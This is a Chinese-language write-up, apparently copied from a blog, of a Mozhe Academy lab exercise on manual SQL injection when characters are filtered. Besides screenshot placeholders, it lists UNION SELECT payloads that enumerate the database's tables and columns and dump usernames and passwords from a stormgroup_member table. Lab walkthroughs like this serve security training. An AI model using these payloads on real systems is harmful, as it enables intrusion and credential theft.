墨者学院-SQL过滤字符后手工注入漏洞测试(第2题)

*判断注入点。存在注入点,并存在过滤。


墨者学院-SQL过滤字符后手工注入漏洞测试(第2题)_第1张图片
image.png

墨者学院-SQL过滤字符后手工注入漏洞测试(第2题)_第2张图片
image.png

墨者学院-SQL过滤字符后手工注入漏洞测试(第2题)_第3张图片
image.png
  • 判断过滤了.过滤了空格


    墨者学院-SQL过滤字符后手工注入漏洞测试(第2题)_第4张图片
    image.png

    墨者学院-SQL过滤字符后手工注入漏洞测试(第2题)_第5张图片
    image.png

    墨者学院-SQL过滤字符后手工注入漏洞测试(第2题)_第6张图片
    image.png
  • 判断过滤了.没有过滤order by,执行union select 1,2,3,4判断过滤了select。要采用编码注入


    墨者学院-SQL过滤字符后手工注入漏洞测试(第2题)_第7张图片
    image.png

    墨者学院-SQL过滤字符后手工注入漏洞测试(第2题)_第8张图片
    image.png
  • 判断字段 4个


    墨者学院-SQL过滤字符后手工注入漏洞测试(第2题)_第9张图片
    image.png
  • 判断位置 union select 1,2,3,4


    墨者学院-SQL过滤字符后手工注入漏洞测试(第2题)_第10张图片
    image.png
  • 判断表名 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()


    墨者学院-SQL过滤字符后手工注入漏洞测试(第2题)_第11张图片
    image.png
  • 判断列名 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='stormgroup_member'


    墨者学院-SQL过滤字符后手工注入漏洞测试(第2题)_第12张图片
    image.png
  • 判断name、password
    union selec 1,group_concat(name),group_concat(password),4 from stormgroup_member


    墨者学院-SQL过滤字符后手工注入漏洞测试(第2题)_第13张图片
    image.png

你可能感兴趣的:(墨者学院-SQL过滤字符后手工注入漏洞测试(第2题))